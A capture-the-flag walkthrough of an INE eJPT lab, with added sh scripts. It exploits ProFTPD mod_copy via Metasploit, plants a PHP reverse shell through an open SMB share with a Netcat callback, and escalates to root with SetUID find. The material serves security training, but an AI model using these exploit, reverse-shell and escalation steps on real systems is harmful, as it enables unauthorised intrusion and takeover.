Host & Network Penetration Testing: Exploitation CTF 3 (EJPT INE)
Hi all,
Welcome to our third exploitation lab!
Let’s dive in and get started.
The first two questions are based on target1.ine.local, and the next two questions are based on target2.ine.local.
Q.1 A vulnerable service may be running on target1.ine.local. If exploitable, retrieve the flag from the root directory.
As usual, we start with an Nmap scan: nmap -sC -sV target1.ine.local.
Only two services are running, and our task is to identify which one is vulnerable. Let’s begin with the FTP service, which the banner identifies as ProFTPD 1.3.5.
To search for known exploits for this version, query the searchsploit database: searchsploit ProFTPD 1.3.5
The results confirm that this version is vulnerable: its mod_copy module accepts the SITE CPFR and SITE CPTO commands without authentication, which lets an attacker copy files into the web root (CVE-2015-3306). Metasploit covers this with the module exploit/unix/ftp/proftpd_modcopy_exec, so load it with: use exploit/unix/ftp/proftpd_modcopy_exec
Type options (short for show options) to list the parameters the module needs.
SITEPATH must point at the directory the web server actually serves, because the module copies a PHP payload there and then requests it over HTTP. After browsing the website we found that the web root is /var/www/html, so we override the module's default.
Set RHOSTS, LHOST and SITEPATH in msfconsole as follows:
set RHOSTS target1.ine.local
set LHOST <IP of your attacking machine>
set SITEPATH /var/www/html
Type run to execute the exploit.
The exploit returns a command shell session; type sessions to list it, and sessions -u 1 to upgrade session 1 to Meterpreter.
The upgrade opens a new session, so interact with it using sessions -i 2.
As the question says, the flag is stored in the root directory (/). Retrieve it with cat /flag1.txt. This gives us the first flag (note the hint it contains, which the next question relies on):
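As an added example (not part of the original write-up or the INE lab), here is a small sh script that makes the ProFTPD step repeatable: a safe pre-check that sends one unauthenticated SITE CPFR (mod_copy answers 350 if the vulnerable module is enabled; CPFR only records a source path and writes nothing), and a generator for a msfconsole resource script so the module options are not typed by hand. It assumes nc (with -w) and msfconsole are on your PATH; the host names are the lab's, the LHOST value in the usage comment is a placeholder, and the FTP replies referred to in the comments are constructed.

```shell
#!/bin/sh
# Added example, not code from the INE lab or the original write-up.
# Helpers for the ProFTPD 1.3.5 / mod_copy step on target1.ine.local.
# Assumptions: nc (with -w) and msfconsole on PATH; target reachable on 21/tcp.

# modcopy_exposed: read an FTP conversation on stdin and succeed (exit 0) if
# any reply starts with 350, i.e. the server accepted SITE CPFR before any
# USER/PASS. That unauthenticated acceptance is what proftpd_modcopy_exec
# abuses (mod_copy, CVE-2015-3306).
modcopy_exposed() {
    grep -q '^350'
}

# probe_modcopy HOST [PORT]: send one unauthenticated SITE CPFR and QUIT.
# CPFR only records a source path on the server; nothing is written.
probe_modcopy() {
    host=$1
    port=${2:-21}
    printf 'SITE CPFR /etc/passwd\r\nQUIT\r\n' | nc -w 5 "$host" "$port" | modcopy_exposed
}

# write_msf_rc RHOSTS LHOST SITEPATH OUTFILE: write a resource script that
# sets the same three options the walkthrough sets by hand.
# SITEPATH must be the directory the web server serves, because the module
# copies its PHP payload there and then fetches it over HTTP.
write_msf_rc() {
    rhosts=$1
    lhost=$2
    sitepath=$3
    out=$4
    cat > "$out" <<EOF
use exploit/unix/ftp/proftpd_modcopy_exec
set RHOSTS $rhosts
set LHOST $lhost
set SITEPATH $sitepath
run
EOF
}

# Example flow (placeholder LHOST 10.10.10.5; run by hand, nothing below
# executes on its own):
#   probe_modcopy target1.ine.local && \
#     write_msf_rc target1.ine.local 10.10.10.5 /var/www/html /tmp/proftpd.rc && \
#     msfconsole -q -r /tmp/proftpd.rc
```

The probe is deliberately read-only: a 350 reply to CPFR is enough evidence, and CPTO (the half that actually writes) is left to the Metasploit module.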
Q.2 Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.
As the question suggests, we need to enumerate services that listen only on the local interface. netstat does not take an address as an argument, so list all listening TCP and UDP sockets with netstat -tuln (or ss -tuln) and look for entries bound to 127.0.0.1.
To interact with the service on port 8888 we need a proper shell first: type shell in the Meterpreter session, then /bin/bash -i to make it interactive. From there connect with nc 127.0.0.1 8888.
The service prompts for a passphrase. Recall the hint in flag1.txt about the three magical words: the passphrase is "letmein", and the service returns our second flag:
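The local-service enumeration above, as an added example not taken from the original post: a sh helper that filters netstat -tuln or ss -tuln output down to sockets bound to the loopback address only (those cannot be reached from outside, which is exactly why they get overlooked during the external scan), plus a one-shot nc client that sends a passphrase. It assumes ss or netstat on the target and a nc build that accepts -q (the Debian/Kali builds do); the port and passphrase in the usage comment are the lab's, and the sample listings in the comments are constructed.

```shell
#!/bin/sh
# Added example, not code from the INE lab or the original write-up.
# Find services bound only to the loopback interface and talk to one of them.

# loopback_listeners: read `netstat -tuln` or `ss -tuln` output on stdin and
# print "<proto> <port>" for every socket bound to 127.0.0.0/8, ::1 or [::1].
# Header lines and wildcard binds (0.0.0.0:*, :::80) never match the pattern,
# so neither tool's layout needs special casing; $1 is the protocol in both.
loopback_listeners() {
    awk '{
        for (i = 2; i <= NF; i++) {
            if ($i ~ /^(127\.[0-9]+\.[0-9]+\.[0-9]+|::1|\[::1\]):[0-9]+$/) {
                port = $i
                sub(/.*:/, "", port)   # keep only what follows the last colon
                print $1, port
            }
        }
    }'
}

# local_services: run whichever socket tool exists and filter its output.
local_services() {
    if command -v ss >/dev/null 2>&1; then
        ss -tuln
    else
        netstat -tuln
    fi | loopback_listeners
}

# talk_local PORT PASSPHRASE: connect to 127.0.0.1:PORT, send the passphrase
# followed by a newline, and print whatever the service answers.
# Assumes a nc that accepts -q (quit N seconds after stdin hits EOF).
talk_local() {
    port=$1
    passphrase=$2
    printf '%s\n' "$passphrase" | nc -q 2 127.0.0.1 "$port"
}

# Usage on the target, from the interactive shell the walkthrough opens:
#   local_services          # prints e.g. "tcp 8888" (constructed)
#   talk_local 8888 letmein
```

Because the filter works on the text rather than on tool-specific columns, the same function can be fed saved output from a box you no longer have a shell on.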
The next two questions are based on target2.ine.local.
Q.3 A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?
As usual, we’ll start with nmap to see what services are running on target2.ine.local using the command: nmap -sC -sV target2.ine.local.
HTTP and SMB are both running, so we enumerate the SMB service with enum4linux: enum4linux -a target2.ine.local.
The share listing shows one share, site-uploads, with Mapping and Listing both OK, meaning a null session can connect to it and list it. Connect with smbclient //target2.ine.local/site-uploads and press Enter for a blank password when prompted.
The share name suggests that files uploaded here are served by the website, so we will upload a PHP reverse shell. First copy the stock PHP reverse shell into the working directory: cp /usr/share/webshells/php/php-reverse-shell.php .
Edit the file to point at your listener: nano php-reverse-shell.php and change the $ip and $port values near the top.
Upload the file from the smbclient prompt: put php-reverse-shell.php
Start a Netcat listener on the port you set in the file: nc -lvnp 1234.
Open the browser and navigate to http://target2.ine.local/site-uploads/php-reverse-shell.php.
The request executes the script and we get our connection back in Netcat.
As the question says, the flag is in the root directory; read it with cat /flag3.txt.
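The upload-and-trigger sequence above, as an added example that is not the original post's code: a sh script that patches the listener address into a copy of the stock reverse shell with sed instead of nano, pushes it over the null session with smbclient's -c option, and fetches the URL with curl to fire the payload. It assumes pentestmonkey's php-reverse-shell.php (the one under /usr/share/webshells/php/ on Kali), whose configuration lines have the form $ip = '127.0.0.1'; and $port = 1234;, and assumes smbclient, curl and nc on the attacking machine; the listener address in the usage comment is a placeholder.

```shell
#!/bin/sh
# Added example, not code from the INE lab or the original write-up.
# Stage the PHP reverse shell through the writable site-uploads share.

# patch_revshell SRC DST LHOST LPORT: copy SRC to DST, rewriting the two
# configuration lines of pentestmonkey's php-reverse-shell.php:
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
# The sed expressions are split so that single quotes protect the literal $
# while the shell still expands $lhost and $lport.
patch_revshell() {
    src=$1
    dst=$2
    lhost=$3
    lport=$4
    sed -e 's/^\$ip = .[^;]*;/$ip = '"'$lhost'"';/' \
        -e 's/^\$port = [0-9]*;/$port = '"$lport"';/' "$src" > "$dst"
}

# smb_upload HOST SHARE FILE: put FILE into the share over a null session
# (-N skips the password prompt, which is what the blank password did above).
smb_upload() {
    host=$1
    share=$2
    file=$3
    smbclient -N "//$host/$share" -c "put $file"
}

# trigger_shell URL: request the uploaded script. The HTTP request stays open
# for as long as the reverse shell lives, so cap it and background it.
trigger_shell() {
    url=$1
    curl -s --max-time 10 "$url" > /dev/null 2>&1 &
}

# End-to-end usage (placeholder LHOST 10.10.10.5, port 1234). Start the
# listener in a second terminal first:  nc -lvnp 1234
#   patch_revshell /usr/share/webshells/php/php-reverse-shell.php shell.php 10.10.10.5 1234
#   smb_upload target2.ine.local site-uploads shell.php
#   trigger_shell http://target2.ine.local/site-uploads/shell.php
```

Renaming the upload (shell.php above) is a small courtesy to yourself: the default file name is on every scanner's wordlist, and a later tester or the blue team will find it immediately.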
Q.4 Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?
We start by listing the login shells installed on the system: cat /etc/shells.
To see how each of those shells is installed, run: grep -v '^#' /etc/shells | while read -r shell; do ls -lL "$shell" 2>/dev/null; done
Note: this reads each non-comment entry in /etc/shells, runs ls -lL on it (-L follows symlinks, so we see the mode of the real binary rather than of the link), and suppresses errors for entries that do not exist with 2>/dev/null.
What we are looking for is not the permissions of a link (a symlink always shows lrwxrwxrwx, which tells us nothing about privilege) but an s in the owner execute position of the resolved binary, for example -rwsr-xr-x, which would mean that shell runs with its owner's privileges. This step tells us which shells exist and whether any of them is itself SetUID; the next step looks for a SetUID program that can launch one of them. Note that rbash is restricted bash and accepts the -p flag used below just as bash does.
Now, to find executables with the SetUID bit set, which run with the permissions of their owner, use: find / -perm -4000 2>/dev/null.
Note: The command find / -perm -4000 2>/dev/null does the following:
find /: starts the search from the root directory /.
-perm -4000: matches files whose SetUID permission bit is set, so whoever executes them does so with the file owner's permissions.
2>/dev/null: redirects error messages (for example, permission denied on directories we cannot read) to /dev/null so they do not clutter the output.
When conducting privilege escalation, identifying SetUID binaries is critical, as they let an executable run with the permissions of its owner, often root. The list that find -perm -4000 returns is our set of candidates; GTFOBins documents which common binaries can be abused this way, and find itself is one of them, so it is the entry worth spotting in that list.
Combining find with a shell such as /bin/sh or /bin/rbash spawns a shell with root privileges: find / -exec /bin/rbash -p \; -quit. This works because find is SetUID root on this target: -exec runs the shell with find's elevated effective UID, the shell's -p (privileged) flag stops bash from resetting that effective UID to our real UID as it does by default, and -quit ends the search after the first match so we get one shell instead of one per file on the system.
After the new shell starts, confirm the elevation with whoami (or id, which also shows the effective UID). The last flag is in the restricted /root directory, so read it with cat /root/flag4.txt.
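The /etc/shells and SetUID checks above, as an added example rather than code from the original post: a sh script that resolves each entry in /etc/shells to the real binary before inspecting its mode (so a symlink's lrwxrwxrwx is never mistaken for a finding), lists SetUID files under a given root, checks whether a SetUID file is actually root-owned, and flags the names GTFOBins documents as SetUID escalation paths (find among them). It generalises the single find / -exec step above into an audit you can run on any host. Only standard GNU userland (find, readlink, stat, ls) is assumed, and the GTFOBins list here is partial.

```shell
#!/bin/sh
# Added example, not code from the INE lab or the original write-up.
# Audit helpers for the privilege-escalation step.

# shell_modes [FILE]: for each non-comment entry in FILE (default /etc/shells)
# print "<ls -l of the resolved binary> <- <entry>". readlink -f follows the
# whole symlink chain, so the mode shown is that of the real executable;
# entries that do not resolve to a regular file are skipped silently.
shell_modes() {
    file=${1:-/etc/shells}
    grep -v '^#' "$file" | while read -r shell; do
        [ -n "$shell" ] || continue
        target=$(readlink -f "$shell" 2>/dev/null) || continue
        [ -f "$target" ] || continue
        printf '%s <- %s\n' "$(ls -l "$target")" "$shell"
    done
}

# suid_binaries [ROOT]: regular files under ROOT with the SetUID bit set.
suid_binaries() {
    find "${1:-/}" -type f -perm -4000 2>/dev/null
}

# setuid_root FILE: succeed only if FILE is SetUID *and* owned by uid 0;
# a SetUID file owned by an ordinary user gives you that user, not root.
setuid_root() {
    [ -u "$1" ] && [ "$(stat -c %u "$1")" -eq 0 ]
}

# dangerous_suid [ROOT]: the subset of suid_binaries whose basename is a
# program GTFOBins lists with a SUID escalation (partial list).
dangerous_suid() {
    suid_binaries "$1" | while read -r bin; do
        case $(basename "$bin") in
            find|bash|rbash|sh|dash|env|python*|perl|vim*|awk|gawk|mawk|cp|mv|less|nano|nmap|tee|busybox)
                echo "$bin" ;;
        esac
    done
}

# escalate_via_find: the walkthrough's step, for a SetUID-root find.
# -exec runs the shell with find's effective uid, bash -p keeps that uid
# instead of dropping it, -quit ends the search after the first match.
escalate_via_find() {
    find . -exec /bin/bash -p \; -quit
}

# Usage on the target:
#   shell_modes
#   dangerous_suid / | while read -r b; do setuid_root "$b" && echo "root: $b"; done
#   escalate_via_find   # only once find itself shows up as SetUID root
```

setuid_root is the check the page skips: a SetUID bit on a binary owned by an unprivileged account is a lateral move at best, so always pair the mode with the owner before spending time on a GTFOBins entry.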
Thank you, everyone, for reading! I hope this article has been helpful in guiding you through the steps.
Happy Hacking!